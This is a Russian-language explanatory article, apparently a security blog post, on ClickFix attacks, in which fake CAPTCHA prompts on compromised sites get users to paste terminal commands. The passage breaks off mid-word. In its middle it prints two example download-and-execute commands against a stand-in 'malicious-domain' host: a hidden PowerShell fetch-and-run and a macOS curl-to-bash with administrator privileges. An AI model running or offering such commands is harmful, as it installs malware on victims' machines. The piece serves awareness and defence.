Введение в проблему: от сложных эксплойтов к социальной инженерии
Пока ваш SOC настраивает эвристику песочниц, а разработчики заделывают дыры в ядрах ОС, злоумышленники нагло кликают правой кнопкой мыши по вашей доверчивости. Представьте: вы заходите на привычный новостной сайт, а вместо статьи вас встречает плашка „Подтвердите, что вы не робот“ с деформированным шрифтом. Пара кликов, стандартная комбинация клавиш — и ваш корпоративный ноутбук уже качает стилер (ведь «работает на моей машине» теперь звучит как угроза). Никаких уязвимостей нулевого дня, никаких сложных эксплойтов. Добро пожаловать в эру ClickFix — атаки, где самый уязвимый компонент инфраструктуры сидит прямо перед монитором.
Атаки ClickFix стремительно становятся мейнстримом. Этот вектор эффективен как против Windows-систем, так и против macOS. Секрет популярности кроется в циничной простоте: хакерам больше не нужны уязвимости в браузерах. Достаточно скомпрометировать легитимный сайт, наложить поверх него интерфейсный оверлей и сыграть на человеческой невнимательности.
Когда казалось, что браузерные песочницы уже не пробить, злоумышленники решили эту проблему извне. Давайте разберем, как именно классическая доверчивость превращается в вектор заражения.
Анатомия атаки: пошаговый разбор цепочки заражения
Технически ClickFix элегантен своей простотой. Вся цепочка держится на компрометации веб-ресурсов и продвинутой социальной инженерии. Рассмотрим этапы атаки:
- Компрометация сайта: Злоумышленники получают доступ к популярному ресурсу (например, через уязвимости в CMS или украденные доступы) и внедряют вредоносный скрипт.
- Демонстрация фальшивой CAPTCHA: Пользователь видит знакомое окно проверки „Я не робот“ или сообщение об ошибке рендеринга страницы.
- Лжедиагностика: Интерфейс сообщает о сбое (например, „Ошибка буфера обмена: требуется верификация“) и предлагает инструкцию для исправления.
- Выполнение команды: Жертву просят открыть терминал (PowerShell или командную строку в Windows, Терминал в macOS), нажать комбинацию клавиш для вставки скопированного из браузера текста и нажать Enter.
В этот момент пользователь сам исполняет обфусцированный скрипт, который скачивает полезную нагрузку минуя защитные фильтры браузера.
Мало заставить пользователя скопировать текст — нужно сделать так, чтобы содержимое буфера обмена выглядело убедительно и не вызывало подозрений до самого нажатия Enter.
Техническая реализация: что скрывает буфер обмена
Самое интересное в ClickFix — это то, как именно злоумышленники доставляют код в буфер обмена. Современные браузеры имеют API для работы с буфером (Clipboard API), но скрипты часто используют классические трюки с невидимыми элементами DOM.
Когда пользователь кликает на кнопку „Скопировать решение“, JavaScript-код незаметно заменяет содержимое буфера. Пример вредоносной команды, которую обычно копирует жертва в Windows, выглядит следующим образом:
powershell -windowstyle hidden -command "Invoke-WebRequest -Uri 'http://malicious-domain[.]com/payload.ps1' -OutFile '$env:TEMP\update.ps1'; & '$env:TEMP\update.ps1'"
Для macOS сценарий аналогичен, но вместо PowerShell используется связка curl и osascript для выполнения цепочки команд в Terminal:
osascript -e 'do shell script "curl -s http://malicious-domain[.]com/payload.sh | bash" with administrator privileges'
Обратите внимание на флаг with administrator privileges или запросы пароля учетной записи в macOS — жертва добровольно вводит пароль, думая, что это часть „исправления ошибки“.
Запуск одной строчки из терминала редко заканчивается простым показом рекламы — чаще всего это лишь точка входа для целого арсенала киберпреступников.
Какие угрозы доставляет ClickFix?
Сам по себе ClickFix — это лишь мето